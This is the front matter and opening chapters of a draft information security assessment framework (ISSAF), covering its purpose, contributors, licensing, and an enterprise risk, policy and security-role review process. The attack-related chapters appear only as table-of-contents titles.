Information Systems Security Assessment Framework (ISSAF)

Information Systems
Security Assessment
Framework (ISSAF)
Draft 0.1.5
Author
Balwant Rathore
Key Contributors
Omar Herrera
Piero Brunati
Clement Dupuis
Rama K
Subramaniam
Bob Johnston
Ross Patel
Umesh Chavan
Johnny Long
Miguel Dilaj
Dieter Sarrazyn
Jeremy Martin
Karmil Asgarally
TABLE OF CONTENTS
1
ABOUT ISSAF......................................................................................................................................3
2
ASSESSMENT FRAMEWORK .......................................................................................................21
3
ENGAGEMENT MANAGEMENT ..................................................................................................44
4
BEST PRACTICES– PRE ASSESSMENT, ASSESSMENT AND POST ASSESSMENT .........58
5
ENTERPRISE SECURITY POLICY...............................................................................................95
6
ENTERPRISE SECURITY ORGANIZATION & MANAGEMENT .........................................108
7
ASSESS ENTERPRISE SECURITY & CONTROLS ..................................................................114
A
PENETRATION TESTING - METHODOLOGY ........................................................................115
B
PENETRATION TESTING METHODOLOGY: DESCRIPTIVE – (CONTINUE….) ............125
C
PASSWORD SECURITY ................................................................................................................269
D
PASSWORD CRACKING STRATEGIES ....................................................................................325
E
UNIX /LINUX SYSTEM SECURITY ASSESSMENT .................................................................344
F
WINDOWS SYSTEM SECURITY ASSESSMENT......................................................................387
G
NOVELL NETWARE SECURITY ASSESSMENT .....................................................................460
H
DATABASE SECURITY ASSESSMENT......................................................................................462
I
WLAN SECURITY ASSESSMENT ...............................................................................................515
J
SWITCH SECURITY ASSESSMENT ...........................................................................................538
K
ROUTER SECURITY ASSESSMENT ..........................................................................................573
L
FIREWALL SECURITY ASSESSMENT......................................................................................617
M
INTRUSION DETECTION SYSTEM SECURITY ASSESSMENT...........................................666
N
VPN SECURITY ASSESSMENT ...................................................................................................690
O
ANTI-VIRUS SYSTEM SECURITY ASSESSMENT AND MANAGEMENT STRATEGY ...700
P
WEB APPLICATION SECURITY ASSESSMENT .....................................................................716
Q
WEB APPLICATION SECURITY (CONTINUE…) – SQL INJECTIONS ..............................774
R WEB APPLICATION SECURITY (CONTINUE…) WEB SERVER SECURITY
ASSESSMENT...........................................................................................................................................804
S
STORAGE AREA NETWORK (SAN) SECURITY .....................................................................816
T
INTERNET USER SECURITY ......................................................................................................826
U
AS 400 SECURITY...........................................................................................................................832
V
LOTUS NOTES SECURITY...........................................................................................................860
W
SOURCE CODE AUDITING .....................................................................................................865
X
BINARY AUDITING .......................................................................................................................866
Y
APPLICATION SECURITY EVALUATION CHECKS .............................................................867
8
SOCIAL ENGINEERING ...............................................................................................................871
9
PHYSICAL SECURITY ASSESSMENT.......................................................................................898
10
ENTERPRISE SECURITY OPERATIONS MANAGEMENT...............................................906
11
SECURITY AWARENESS AND TRAINING ..........................................................................929
12
OUTSOURCING SECURITY CONCERNS .............................................................................938
13
BUSINESS CONTINUITY PLANNING AND DISASTER RECOVERY .............................939
BUSINESS CONTINUITY PLANNING.................................................................................................940
DISASTER RECOVERY PLANNING ...................................................................................................943
14
LEGAL AND REGULATORY COMPLIANCE ......................................................................983
15
INCIDENT ANALYSIS...............................................................................................................986
KNOWLEDGE BASE...............................................................................................................................996
1
BUILD FOUNDATION ...................................................................................................................997
2
DESKTOP SECURITY CHECK-LIST - WINDOWS ................................................................1031
3
LINUX SECURITY CHECK-LIST..............................................................................................1037
4
SOLARIS OPERATING SYSTEM SECURITY CHECK-LIST ...............................................1040
5
PENETRATION TESTING LAB DESIGN .................................................................................1062
6
LINKS..............................................................................................................................................1073
7
TEMPLATES / OTHERS ..............................................................................................................1102
Page 2 of 1123
1 EXECUTIVE SUMMARY
Uncertainty abounds in today's economy. Every organization is, to some extent, in the
business of risk management, no matter what its products or services. It is not possible
to "create a business that doesn't take risks," according to Richard Boulton and
colleagues. "If you try, you will create a business that doesn't make money." As a
business continually changes, so do the risks. Stakeholders increasingly want
companies to identify and manage their business risks. More specifically, stakeholders
want management to meet their earnings goals. Risk management can help them do so.
According to Susan Stalnecker, vice president and treasurer of DuPont, "Risk
management is a strategic tool that can increase profitability and smooth earnings
volatility." Senior management must manage the ever-changing risks if they are to
create, protect, and enhance shareholder value.
-- Source: Excerpted from “Making Enterprise risk management pay off” by T.Barton et al
Risk management despite its key role in formulating business priorities is not usually a
central activity within an organization. Today no organization that we know has a Chief
Risk Officer. It is expected that the CEO, or the CFO or the CIO will handle risk as part of
their portfolio of results. Loss avoidance is usually the priority when risk is handled in this
manner. Addressing opportunities however requires a bit more than just loss avoidance,
it has to address the uncertainties an organization has to deal with. And today no
uncertainty is more certain than the fact that information technology can create risks that
can put an organization’s reputation on the line and end up destroying critical assets that
the business requires to manage day to day operations. To address this Information
Security has evolved today into a body of knowledge that has many different contributors
providing vital insights into the benefits of information controls and technology standards.
Unfortunately all of this activity has not still culminated in a unifying principle that would
integrate the plenitude of options available today, including multiple standards, many
control frameworks and divergent methodologies. Practitioners of information security as
a profession are therefore still seeking a disciplined approach that could contextually
place the available offerings to help them identify and apply the right answers to their
most pressing concerns.
To understand this situation better, it is important to realize the nature of information
itself and it’s role in enabling those seeking to manage business priorities. A business
Page 3 of 1123
comes into existence to transform resources into results with the objective of exchanging
these results for revenue. Information itself is derived from this transactional nature of
business. Hence what is important to a business is not the data collected during
transactions but in how this data can be used to understand and manage business
priorities, whether is managing cash flow, or fulfilling customer orders. Business
transactions by their very nature are dependent on organizational infrastructure.
Information is captured, processed and delivered using technology infrastructure in the
form of systems and people. Internal processes combine these systems and people into
the shared services that constitute front office and back office units that have to work in
concert to deliver the desired business results. As such Information and Technology
have a vital role to play in enabling cost efficient, and increasingly time efficient business
transaction processing. Any downtime caused by disruption in the underlying technology
or the processes or the subversion of the information delivered by these technologies or
processes result in a cumulative impact that can lead to losses that are either critical or
material to an organization. Critical when the nature of these disruptions lead to a loss of
trust in customers or other vital stakeholders in the dependability of the business
infrastructure as it then threatens the survival of the organization. Material when it leads
to substantive losses caused by the dissolution of assets represented by accumulated
transactional information, as it would require substantial financial resources to replace or
repair these losses.
Before a company can manage it’s risks, it has to know what risks it has to manage. And
to understand these risks, it is important to consider strategic business scenarios. For
example a key scenario for a CEO could be a question such as What happens if we add
a new business capability such as an e-Business portal? How will it impact our existing
ability to deliver results is as important a consideration as asking the other side of the
question, which is what happens if we don’t add the business capability? Will our
customers shift to a competitor because they prefer the added value the new capabilities
will bring to bear on their transactions? It is in considering these scenarios that the
relationship between risk and opportunity becomes clear to both the CEO who has to
drive the required organizational changes and the IT division that will be tasked with
delivering the changes to systems to enable the organizational changes. Therefore both
the leaders of an organization who will create the driving vision as well as the managers
who will implement the desired changes need to meet on common ground. At OISSG we
have chosen to focus on Enterprise Risk Management to facilitate IT as a business
Page 4 of 1123
enabler in delivering new business capabilities. We have chosen to deliver this using a
disciplined approach that step by step identifies and eliminates business inhibitors
related to the risks that accrue from implementing information related technologies.
This summarizes the vision that led to the development of ISSAF. We consider
assessment as the unifying idea to integrate three separate but related set of risk
management activities viz interviewing, observation and testing. We have chosen
assessment as a process instead of auditing because auditing will require an
established body to promulgate the underlying standards. As an open source
organization that have not sought such affiliations to date, we have not been restricted in
choosing an approach that integrates exhaustive penetration testing with accepted
business continuity practices, and seeks to validate the alignment of business policies to
internal IT realities. All of this is delivered through a step by step engagement
management approach to facilitate the assessment process within an organization
seeking to secure their information assets.
I think the point to risk management is not to try and operate your business in a risk-free
environment. It's to tip the scale to your advantage. So it becomes strategic rather than
just defensive.
—Peter G. M. Cox, CFO, United Grain Growers Ltd.
Page 5 of 1123
2 ABOUT ISSAF
2.1 PREFACE
Today, the evaluation of Information Systems (IS) security in accordance with business
requirements is a vital component of any organizations business strategy. While there
are a few information security assessment standards, methodologies and frameworks
that talk about what areas of security must be considered, they do not contain specifics
on HOW and WHY existing security measures should be assessed, nor do they
recommend controls to safeguard them.
The Information System Security Assessment Framework (ISSAF) is a peer reviewed
structured framework that categorizes information system security assessment into
various domains & details specific evaluation or testing criteria for each of these
domains. It aims to provide field inputs on security assessment that reflect real life
scenarios. ISSAF should primarily be used to fulfill an organization’s security
assessment requirements and may additionally be used as a reference for meeting other
information security needs. ISSAF includes the crucial facet of security processes and,
their assessment and hardening to get a complete picture of the vulnerabilities that might
exists.
The information in ISSAF is organized into well defined evaluation criteria, each of which
has been reviewed by subject matter experts in that domain. These evaluation criteria
include:
•
A description of the evaluation criteria.
•
Its aims & objectives
•
The pre-requisites for conducting the evaluations
•
The process for the evaluation
•
Displays the expected results
•
Recommended countermeasures
•
References to external documents
Overall framework is large, we chose to provide as much information as possible on the
assumption that it would be easier for users to delete material rather than develop it. The
Page 6 of 1123
Information System Security Assessment Framework (ISSAF) is an evolving document
that will be expanded, amended and updated in future.
2.1.1 What are the Objectives of ISSAF?
•
To act as an end-to-end reference document for security assessment
•
To standardize the Information System Security Assessment process
•
To set the minimal level of acceptable process
•
To provide a baseline on which an assessment can (or should) be performed
•
To asses safeguards deployed against unauthorized access
•
To act as a reference for information security implementation
•
To strengthen existing security processes and technology
2.1.2 What are the Goals of ISSAF?
The goal of the ISSAF is to provide a single point of reference for security assessment.
It is a reference that is closely aligned with real world security assessment issues and
that is a value proposition for businesses. To this aim the ISSAF has the following highlevel agenda:
•
Evaluate the organizations information security policies and ensure that they meet
industry requirements & do not violate any applicable laws & regulations
•
Identify critical information systems infrastructure required for the organizations
business processes and evaluate their security
•
Conduct vulnerability assessments & penetration tests to highlight system
vulnerabilities thereby identifying weaknesses in systems, networks and applications
•
Evaluate controls applied to various security domains by:
o
Finding mis-configurations and rectifying them
o
Identify known and unknown risks related to technologies and address them
o
Identify known and unknown risks within your people or business processes
and address them
o
•
Strengthening existing processes and technologies
Prioritize assessment activities as per system criticality, testing expenses, and
expected benefits
•
Educate people on performing security assessments
Page 7 of 1123
•
Educate people on securing systems, networks and applications
•
Provide information on
o
The review of logging, monitoring & auditing processes
o
The building and review of Disaster Recovery Plan
o
The review of outsourcing security concerns
•
Compliance to Legal & Regulatory Standards
•
Create Security Awareness
•
Effective Management of Security Assessment Projects
•
Guarding against social engineering exploitation
•
Physical security control review
This approach is based on using the shortest path required to achieve one’s goal by
finding flaws that can be exploited efficiently, with the minimal effort. The goal of this
framework is to give completeness and accuracy, efficiency to security assessments.
2.1.3 Why we had come up with ISSAF?
After working on many information assurance projects, the lack of a comprehensive
framework that provides information security assurance through performing standardized
vulnerability assessment, penetration testing, security assessment and security audit,
was felt.
ISSAF is a comprehensive and in-depth framework that helps avoid the risk inherent in
narrow or ineffective security assessment methodologies. In ISSAF we have tried to
define an information system security assessment methodology that is more
comprehensive than other assessment frameworks, it seeks to mitigate the inherent risk
in the security assessment process itself. It helps us understand the business risks that
we face in performing our daily operations. The threats, vulnerabilities, and potential
exposures that affect our organizations are too huge to be ignored.
At this particular time it is not the answer to every question or situation, but we are
committed to continuous improvement by improving current topics and adding new
topics.
Page 8 of 1123
ISSAF has laid the foundation; now it’s your turn to benefit from it, whether you use it as
is or tailor the materials to suit your organization needs. Welcome to ISSAF, we hope
you will find it useful.
2.2 TARGET AUDIENCE
This framework is aimed at a wide spectrum of audiences that include:
•
Internal and External Vulnerability Assessors, Penetration Testers, Security Auditors
and Security Assessors
•
Professionals responsible for information security perimeter security
•
Security engineers and consultants
•
Security assessment project managers
•
Information system staff responsible for information security
•
System/network/Web administrators
•
Technical and Functional Managers
Page 9 of 1123
2.3 CONTRIBUTORS
2.3.1 Contributor Contacts and References
-Ascending order by Name
Page 10 of 1123
2.3.2 Contributors as per Domain
Domain
Project Management
Author[s]
S.Saravanan and Balwant
Rathore
Best Practices – PreAssessment, Assessment, Post
Balwant Rathore
Assessment
Evaluation of Third Party
Contracts
Assessment Framework
Contributor[s]
Viraf Hathiram
S.Saravanan
Omar Herrera
Dieter Sarrazyn
Balwant Rathore
Balwant Rathore
Umesh Chavan
Johnny Long
Gareth Davies
Technical Control Assessment
Methodology
Balwant Rathore
Pukhraj Singh
Param Singh
Dieter Sarrazyn
Kartikeya Puri
Review Information Security
Policy And Security
Umesh Chavan
R.S. Sundar
Organization
Review Risk Assessment And
Umesh Chavan
Classification
Balwant Rathore
Password Security
Miguel Dilaj
Major Gajendra Singh
Bernardo Reino aka lepton
Piero Brunati
Matteo Brunati
Password Cracking Strategies
Unix /Linux System Security
Assessment
Pietro Brunati
Miguel Dilaj
Arturo "Buanzo" Busleiman
Balwant Rathore
Kartikeya Puri
Jayesh Thakur
Linux Audit Check-List
Hiten Desai
Linux Audit Tool
Hiten Desai
Solaris Audit Check-List
Jayesh Thakur
Solaris Audit Tool
Vijay Ganpathy
Windows System Security
Bernardo Reino aka lepton
Balwant Rathore
Arturo "Buanzo" Busleiman
Dieter Sarrazyn
R.S. Sundar
Kartikeya Puri
Page 11 of 1123
Assessment
Windows Security Audit Tool
Desktop Security Checklist -
Oscar Marin
Dieter Sarrazyn
Umesh Chavan
Balwant Rathore
Balwant Rathore
Kartikeya Puri
Database Security Assessment
K. K. Mookhey
Balwant Rathore
Wireless Security Assessment
Balwant Rathore
Windows
Novell Netware Security
Assessment
Wi-fi Security Assessment
Physical Security Assessment
J Sheik Abdulla
Anish Mohammed
Balwant Rathore
Balwant Rathore
Umesh Chavan
Switch Security Assessment
Balwant Rathore
Cesar Tascon
Router Security Assessment
Balwant Rathore
Manish Uboveja
Firewall Security Assessment
Balwant Rathore
Dieter Sarrazyn
Default Ports – Firewall
Intrusion Detection System
Security Assessment
Default Ports – IDS/IPS
VPN Security Assessment
Anti-Virus System Security
Assessment And Management
Strategy
Web Application Security
Web Application Security –
SQL Injections
Vinay Tiwari
Balwant Rathore
Balwant Rathore
Umesh Chavan
Miguel Dilaj
Balwant Rathore
Hemil Shah
Balwant Rathore
Hernan Marcelo Racciatti
Disaster Recovery Planning
Rishi Pande
Balwant Rathore
IIS Audit Check-List
And Disaster Recovery
Dragos
Gabrial O. Zabal
Balwant Rathore
Business Continuity Planning
Oliver Karow
Vinary Tiwari
Web Server Security
Binary Auditing
Dieter Sarrazyn
Hernan Marcelo Racciatti
Rahul
Balwant Rathore
R.S. Sundar
Kalpesh Doshi
Balwant Rathore
Page 12 of 1123
Social Engineering
Umesh Chavan
Dragos
Incident Analysis
Muhammad Faisal Rauf Danka
Storage Area Network (SAN)
Balwant Rathore
Security
Hari Prasad Chede
Internet User Security
Balwant Rathore
Review Of Logging / Monitoring
R.S. Sundar
& Auditing Processes
Umesh Chavan
Assess Outsourcing Security
Concerns
Security Awareness And
Training
Balwant Rathore
Kartikeya Puri
Thanzeer
Umesh Chavan
R.S.Sundar
Salman Ashraf
Patrick
Balwant Rathore
Knowledge Base
Legal Aspects Of Security
Balwant Rathore
Assessment Projects
Sandhya Khamesra
Dos Attacks: Instigation And
Mitigation
Jeremy Martin
Virus & Worms
Jeremy Martin
Cryptography
Jeremy Martin
Non-Disclosure Agreement
(NDA)
Balwant Rathore
Security Assessment
Balwant Rathore
Contract
Sandhya Khamesra
Request For Proposal
Template
Vulnerability Assessment /
Penetration Testing Lab
Links
Report Template
Balwant Rathore
Hamid kashfi
Balwant Rathore
Marko
Marko Ruotsalainen
Balwant Rathore
Umesh Chavan
2.3.3 Key Contributors Introduction
Page 13 of 1123
Omar Herrera
Clement Dupuis
Bob Johnston
Jeremy Martin
Rama K Subramaniam
Ross Patel
Johnny Long
Karmil Asgarally
Umesh Chavan
Umesh Chavan is an information security professional with over 7 years of Experience &
holds a CISSP. He is currently working with CoreObjects, India where he is involved in
the development of security products. Prior to this he worked with JP Morgan Chase as
an Information Risk manager & as an Information Security Specialist with Larsen &
Toubro Infotech Ltd. He has exposure to the various domains in security and has a
unique blend of both process & technical knowledge. He likes conversing with people,
sharing new ideas and enriching his knowledge not necessarily restricted to the field on
information security.
Miguel Dilaj
Born in 1971 Started using computers in 1982 (venerable C64).
Migrated to Amiga in the late 80's (still have and use regularly a
PowerPC Amiga) Became involved with PC and AS/400 in the
90's. First serious use of Linux in 1998 (RedHat 5.1), tried
FreeBSD, NetBSD and OpenBSD and fall back to Linux RedHatbased,
Slackware-based
and
Debian-based
distros
tried.
Currently using Debian-based, Continuous Windows use from
3.0 up to XP Pro Became deeply into IT Security in '98, when it started to be possible to
have real control of the situation (i.e. Linux!) Started training other people in Linux and IT
Security in 2000, currently working in the Quality Assurance and Automation fields
(Computerized System Validation) Interested in clusters and their use for password
auditing
Page 14 of 1123
Piero Brunati
Co-founder of Nest (www.nestonline.com) where he performs
Research, Ethical Hacking and develops software, he tries hard
to mitigate customers' nightmares. He begun butchering
computers since the good old 70's, when he spent his first salary
to buy the components he used to solder his first computer (8008
CPU, 2k static RAM, 2k EPROM, serial and parallel I/O).
K. K. Mookhey
K. K. Mookhey is the Founder and Chief Technology Office of Network Intelligence
(www.nii.co.in), an information security consulting firm. He has provided security
consulting services to Fortune 500 companies and industry segment leaders in India,
Middle East, and North America. He has pioneered the development of the AuditPro
suite of security auditing software, as well as initiated the research efforts within the
company. His vulnerability research team has found security vulnerabilities in products
from vendors such as Oracle, Symantec, and Macromedia. He is a regular contributor to
the Infocus series of articles on SecurityFocus, as well as various industry journals such
as IS Control and IT Audit. He is the author of a monograph on "Linux Security Audit and
Controls" commissioned by the Information Systems Audit and Control Association
(ISACA). He is also the author of the chapter on “Web Application Attacks” in the
upcoming version of the OWASP Guide.
Dieter Sarrazyn
Dieter Sarrazyn has been an information security consultant and
trainer for more than 6 years now.
Page 15 of 1123
Dieter is a certified and experienced Professional in the areas of creating secure
information systems and network architectures, Performing Security Audits of Systema
and Network infrastructures, performing penetration tests and installing and configuring
firewall and VPN solutions. Other expertise lays in the areas of system and network
management, installing and configuring antivirus solutions and installing & configuring
mail relay systems.
Dieter first worked as a Security Engineer in a Network Integration Company and then
moved towards Security Consulting at the company he's still working for. His main tasks
are performing penetration testing, security auditing and teaching the Hacking Inside Out
course. He is also a Local Mentor for SANS tracks 1 and 4.
Dieter has earned the following certifications: CISSP, GSEC, GCIH, CCSA & CCSE.
Page 16 of 1123
2.4 DOCUMENT ORGANIZATION AND CONVENTIONS
2.4.1 Document Organization
This framework briefly discusses the requirements for security assessments and
explains in detail the methodology of security assessments. The sections are organized
as follows:
1. Project Management
2. Guidelines And Best Practices – Pre Assessment, Assessment And Post
Assessment
3. Assessment Methodology
4. Review Of Information Security Policy And Security Organization
5. Evaluation Of Risk Assessment Methodology
6. Technical Control Assessment
•
Technical Control Assessment - Methodology
•
Password Security
•
Password Cracking Strategies
•
Unix /Linux System Security Assessment
•
Windows System Security Assessment
•
Novell Netware Security Assessment
•
Database Security Assessment
•
Wireless Security Assessment
•
Switch Security Assessment
•
Router Security Assessment
•
Firewall Security Assessment
•
Intrusion Detection System Security Assessment
•
VPN Security Assessment
•
Anti-Virus System Security Assessment And Management Strategy
•
Web Application Security Assessment
•
Storage Area Network (San) Security
•
Internet User Security
•
As 400 Security
•
Source Code Auditing
•
Binary Auditing
Page 17 of 1123
7. Social Engineering
8. Physical Security Assessment
9. Incident Analysis
10. Review Of Logging / Monitoring & Auditing Processes
11. Business Continuity Planning And Disaster Recovery
12. Security Awareness And Training
13. Outsourcing Security Concerns
14. Knowledge Base
•
Legal Aspects Of Security Assessment Projects
•
Non-Disclosure Agreement (NDA)
•
Security Assessment Contract
•
Request For Proposal Template
•
Desktop Security Check-List - Windows
•
Linux Security Check-List
•
Solaris Operating System Security Check-List
•
Default Ports - Firewall
•
Default Ports – IDS/IPS
•
Links
•
Penetration Testing Lab Design
2.4.2 Document Convention
Many places in this document we use following test case template:
Page 18 of 1123
Heading of Topic
Introduction
(Description / purpose / requirement / terminology / history)
Objective
Expected Results
Methodology
(Structured steps that needs to be followed to complete test case)
Per Test / Technique
Description
Objective
Expected Result
Pre-requisite
Process (Steps to complete this task)
[Description]
[Example/Results]
[Countermeasure]
Example/Results of common testing tool(s)
Countermeasure(s)
Further Reading(s)
Contributor(s)
Global Comments
Global Countermeasure(s)
Contributor(s)
Further Reading(s)
Page 19 of 1123
2.5 DISCLAIMER
While all possible precautions have been taken to ensure accuracy during the
development of the Information System Security Assessment Framework (ISSAF), also
referred to as ISSAF, the Open Information System Security Group (OISSG) assumes
no responsibility for any damages, errors or downtime resulting or caused by the use of
the information contained herein.
OISSG does not warrant or assume any legal liability or responsibility for the
completeness, usefulness, accuracy of the information presented in this document.
OISSG will not be responsible for any damage, malfunction, downtime, or other errors
that might result from the usage of this document.
2.6 LICENSING
•
We impose no restrictions to any individual/organization for practicing the ISSAF
•
Any individual/organization will be granted unlimited distribution of the ISSAF
provided the copyright is included in the document & the authors name[s] are
maintained in the document after the final release of ISSAF. This release is a draft
and to distribute it, one needs to take permission from OISSG.
•
We impose no restrictions to any individual/organization to develop products based
on it.
•
A written authorization is required from OISSG for any individual or organization that
provides training based on ISSAF and/or wants to use ISSAF material for
commercial training purposes
•
Generally tools developed for ISSAF assessment are released under GNU GPL
(http://www.opensource.org/licenses/gpl-license.html)
•
OISSG reserves the right to change the licensing policy at its own discretion.
Do reach us for more detail on our licensing at licensing@oissg.org
Page 20 of 1123
3 ASSESSMENT FRAMEWORK
INTRODUCTION
The Security Assessment Framework provides a holistic approach to assessing
Information Security Risks to an enterprise.
The framework advocates approaching
Information Security Risk assessments from the perspective of the enterprise business
objectives and associated risks.
This would ensure the alignment of the enterprise
business risks with the risks in relation to the nature and extent of usage of Information
Technology for the achievement of the business objectives of an enterprise.
Enterprise Security Assessment Framework
Identify Gross Risk
Evaluate Enterprise Information Security Policy
Evaluate Enterprise Information Security Organization & Management
Assess Enterprise Security &
Controls
Evaluate Enterprise Security
Operations Management
Physical and Environmental Security
Capacity Management
Technical Controls Assessment
Vulnerability Management
Patch Management
Secure Application Development
Release Management
Configuration Management
Security Awareness
Enterprise Incident Management
Change Management
Security Awareness Program
Assess Business Continuity and Disaster Recovery Planning
Evaluate Legal and Regulatory Compliance
Manage Residual Risks
Page 21 of 1123
Identify Gross Risk
The framework commences with an Enterprise Risk Assessment of the business which
helps identify the gross risk to the business as a whole. This provides focus to the
nature of risks being considered for the assessment of Information Security. The gross
risks identified during the assessment are further used to identify specific risks that stem
from the nature and extent of usage of Information Technology in the enterprise. The
identified Information Technology risks are then used to formulate the security and
control requirements of the enterprise.
Given the costs of implementing and maintaining security and controls in the Information
Technology environment, an enterprise would consider the cost benefit of any security
implementation by measuring the cost of control against the impact of not having such a
control. In instances where the cost of control exceeds the impact of the risk both in
terms of effort and value, the enterprise may choose not to implement such security or
control mechanisms. Alternatively, the insignificance of the impact of risks may also
prompt an enterprise not to implement any specific controls to mitigate these risks. Such
risks are considered as ‘Residual Risks’ (refer 3.8 Residual Risk Management) in the
Security Assessment Framework
The gross risks identified applicable to the Information Technology implemented within
an organization are then evaluated to identify to the extent of threats and probability of
occurrence of such threats.
Based on a ranking of the threats, the probability of
occurrence and impact of the risks to the business the basis for the assessment of
Enterprise Security is formulated.
Evaluate Enterprise Information Security Policy
Upon commencing an Enterprise Security Assessment one of the first tasks would be to
understand and evaluate the Information Security Policy of the enterprise.
The
Information Security Policy is a reflection of the management’s intent and approach to
Information Security and epitomizes the extent and the nature of Information Security
implemented within the Enterprise. A review of the enterprise’s Information Security
Policy is necessary to gain a comprehensive understanding of the approach to
implementing and maintaining the Information Security posture of the organization.
Evaluate Information Security Organization and Management
Page 22 of 1123
Subsequent to the Enterprise Risk Assessment and the review of the Information
Security Policy, a review of the Information Security Organization and Management is
performed. This comprises of a review of the organization of the security functions,
relevant roles and responsibilities and management responsibilities amongst other
areas.
Having obtained an understanding of the risks applicable to the technology infrastructure
of the enterprise, the enterprise’s approach to managing security as stated in its
Information Security policy and the allocation of security roles and responsibilities it
would be logical to assess the specific security infrastructure and operational controls
implemented within the enterprise to mitigate the identified Information Technology risks.
This stage of the Security Risk Assessment Framework comprises of the following:
•
•
Enterprise Security and Controls Assessment
Operations Management Assessment
Assess Enterprise IS Security and Controls
This stage comprises of a review of the following:
•
Physical and Environmental Security
•
Technical Controls Assessment
•
-
Technical Controls Assessment Methodology
-
Database security
-
Host Security
-
Application Security and Controls
-
Network Security
-
Secure Application Development Process
Security Awareness
-
Review of Security Awareness Program (SAP)
-
Interviews
-
Observation
-
Structured walk through
-
Social Engineering
Evaluate Security Operations Management
Page 23 of 1123
This review is performed in conjunction with the Enterprise Security and Controls
Assessment, to gain an understanding of the risks and controls of the security operations
processes. This would comprise of the assessment of the following operational areas:
•
Capacity Management
•
Vulnerability Management
•
Release Management
•
-
Patch Management
-
Configuration Management
-
Change Management
Enterprise Incident Management
-
Logging
-
Monitoring
-
Security Incident Management
-
Operation Event Management
•
User Management
•
Certification and Accreditation
Assess Business Continuity and Disaster Recovery Planning
A review of the Disaster Recovery capabilities of the enterprise is essential to assess
adequacy of the readiness of the enterprise in ensuring availability of the Information
Technology infrastructure.
This review is complemented with a review of Business
Continuity processes of the enterprise to ensure that in the event of a disaster the
enterprise is adequately prepared to continue business operations till such time that
normal operations are completely restored.
Evaluate Legal and Regulatory Compliance
A review of the legal and regulatory requirements impacting the enterprise is essential to
ensure that the enterprise is compliant with any legal or regulatory laws that are
applicable to the Information Technology infrastructure of the enterprise.
Manage Residual Risks
As stated earlier, the risks not covered by the enterprise’s security and controls
implementations are categorized as Residual Risks.
Given the volatile nature of
business in general and the ever changing risks applicable to the industry and
Page 24 of 1123
information technology, it is important to constantly review the residual risks not
addressed by an enterprise’s Information Security Management Framework.
This is
required to ensure that risks that were previously categorized as residual are
appropriately escalated and managed as their relevance and importance to the
enterprise changes.
A review of the process for management of Residual Risks is performed to ensure that
residual risks are continuously review and reassessed to ensure that their status of
criticality has not changed and the need for controls or security implementations in these
areas has not increased.
Page 25 of 1123
3.1 IDENTIFY PERTINENT (GROSS) RISK
The objective of identifying Gross Risk is to establish the risk environment impacting the
organization. The risks identified during this stage of the assessment would largely
reflect the high level business risks impacting the enterprises business objectives.
Why perform a risk assessment of the business objectives of the business?, a
question that is often considered by information security practitioners. It is true that
business risks envisaged by the senior management have no bearing on the applicable
technology risks however, all technology risks translate into a certain form of business
risk that impedes the achievement of the enterprise’s business goals. The two, are
certainly related and stem from each other (refer Figure 1: Enterprise & Technology Risk
Relationships). The reason an approach from the business angle is prescribed in this
framework, is to ensure that the objectives of Information Security Management are
aligned to the Risk Management objectives of the enterprise as a whole.
Figure 1: Enterprise & Technology Risk Relationships
This provides focus to the nature of risks being considered for the assessment of
Information Security. The gross risks identified during the assessment are further used
to identify specific risks impacting the information used by the enterprise for its business
operations and from the nature and extent of usage of Information Technology in the
enterprise. The identified Information Technology risks are then used to formulate and
review the security and control requirements of the enterprise.
The Enterprise Risk Assessment Methodology is detailed in the ISSAF’s Enterprise Risk
Assessment document.
Page 26 of 1123
Page 27 of 1123
3.2 EVALUATE ENTERPRISE INFORMATION SECURITY POLICY
The objective of evaluating the enterprise information security policy is to determine
whether the enterprise’s policies cover the appropriate areas of concerns to the
enterprise regarding information security. An evaluation will generally include discussion
with management, a review of the policies to evaluate the areas covered, and
identification of appropriate approval by management.
3.2.1 Information Security Policy Review
3.2.1.1 FORMALIZED SECURITY POLICY, PROCEDURES, STANDARDS & GUIDELINES
3.2.1.2 SECURITY POLICY MAINTENANCE
3.3 REVIEW OF ENTERPRISE SECURITY ORGANIZATION AND MANAGEMENT
3.3.1 Senior Management
The Senior Management comprising of the senior most management team members of
the enterprise, provide the necessary commitment and support for the management of
the enterprise’s Information Security initiatives. This is to ensure that relevance and
importance of Information Security is adequately communicated, understood and
diligently implemented and adhered to by the personnel of the enterprise.
3.3.2 Information Security Forum
The Information Security Forum of the enterprise is active representative of the senior
management and comprises of key operational management personnel with sufficient
authority for decision making. The Information Security Forum is responsible for:
•
The approval of Information Security Policies, Procedures and Minimum Baseline
Standards for configurations
•
The roles and responsibilities each Information Security Organization team
personnel
•
The approval of disciplinary actions in respect of Information Security incidents
Page 28 of 1123
•
The
review,
monitoring
and
approval
of
all
Information
Security
related
implementation initiatives
3.3.3 Security Organization
The Security Organization of the enterprise is active arm of the Information Security
Forum that is responsible for the implementation of the Information Security initiatives of
the organization. The specific structure, roles and responsibilities of the security
organization may differ from enterprise to enterprise depending on the size and
infrastructural complexities of the IT infrastructure of the enterprise. The following
sections provide some of the commonly found roles along with indicative responsibilities
of these roles.
3.3.4 Information Security Roles and Responsibilities
The effectiveness of any Information Security Management framework is dependent on
the personnel who administer the security implementation. This would depend on how
effectively the enterprise assigns and manages the roles and responsibilities for the
implementation and management of Information Security.
The assessment of an Information Security Framework would also comprise of a review
of the specific roles and responsibilities allocated to specific groups or individual
personnel of an enterprise. Some of the key roles are responsibilities are listed below
along with specific responsibilities that would be ideally allocated to such roles.
3.3.5 Chief Information Security Officer
The Chief Information Security Officer (CISO) is the senior most position in a security
management organization within an enterprise. The CISO’s role will at a minimum
include the following responsibilities:
•
Identification of the strategic direction of Information Security within the enterprise
•
Ensuring alignment of information security objectives with the strategic IT plan and
the strategic business objectives of the enterprise
•
Ensuring alignment of the security management objectives with the risk management
objectives of the enterprise
•
Ensuring the alignment of the information risk management framework with the risk
management framework of the enterprise
Page 29 of 1123
•
Ensuring appropriate security management organization and infrastructure is
implemented in the enterprise to ensure that the information risks of the enterprise
are appropriately managed
•
Ensuring the effectiveness of the information risk identification and management
process of the enterprise
3.3.5.1 PHYSICAL SECURITY MANAGER
The Physical Security Manager’s role is responsible for the management the security of
the physical facilities related to Information Technology implemented within an
organization. Such responsibilities will at a minimum include the following:
•
Implementation and management of physical access controls at each of the facilities
of the enterprise
•
Implementing and sustaining suitable environmental controls to ensure that an
appropriate environment is provided for the infrastructure of the enterprise
•
Ensuring the upkeep of the facilities in accordance with any enterprise facilities
management policies or applicable best practices
3.3.5.2 INFRASTRUCTURE SECURITY MANAGER
The Infrastructure Security Manager’s role is responsible for the management of security
of specific infrastructure components of the IS infrastructure of the enterprise. This
would include:
•
Implementation and management of logical security of infrastructure components
